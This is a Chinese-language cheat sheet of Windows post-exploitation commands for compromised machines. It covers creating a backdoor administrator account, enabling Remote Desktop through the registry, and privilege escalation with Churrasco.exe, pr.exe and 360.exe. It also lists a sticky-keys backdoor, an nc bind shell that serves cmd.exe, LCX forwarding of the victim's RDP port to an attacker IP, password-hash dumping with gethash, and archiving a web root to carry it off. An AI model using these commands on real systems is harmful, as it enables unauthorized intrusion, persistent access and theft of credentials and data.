CMD部分提权常用命令
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net use z:127.0.0.1c$ 映射对方的C盘
net user 查看所有用户列表
net user xiaoma xiaoma /add 添加用户xiaoma密码为xiaoma
net localgroup administrators xiaoma /add 将帐号xiaoma升级为管理员
attrib 隐藏文件
开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查终端端口
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
巴西烤肉 Churrasco.exe "命令"
使用方法:
C:\RECYCLER\Churrasco.exe "net user xiaoma xiaoma /add && net localgroup administrators xiaoma /add"
C:\RECYCLER\Churrasco.exe "net user admin$ /del" 删除帐号
query user 查看会话
logoff ID号 踢掉
C:\RECYCLER\Churrasco.exe "logoff 1"
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
NC反弹
路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe
c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上传
DOS界面下运行:
NC -vv www.baidu.com 80<1.txt
-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
LCX端口转发
先本地监听51端口 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389 LCX转发
c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
360提权
1.开启终端服务,端口为3389;用法:360.exe “port”
2.替换5下shift为cmd;用法:360.exe “sethc”
====================================================================
gethash使用
C:\RECYCLER\gethash.exe $local
=========================================================================
pr提权
c:\recycler\cmd.exe
c:\recycler\pr.exe
pr.exe "net user xiaoma xiaoma /add & net localgroup administrators xiaoma /add"
================================================================================
rar.exe打包命令
cmd.exe /c "\Program Files\winrar\rar.exe" a -r d:\wwwroot\1.rar d:\wwwroot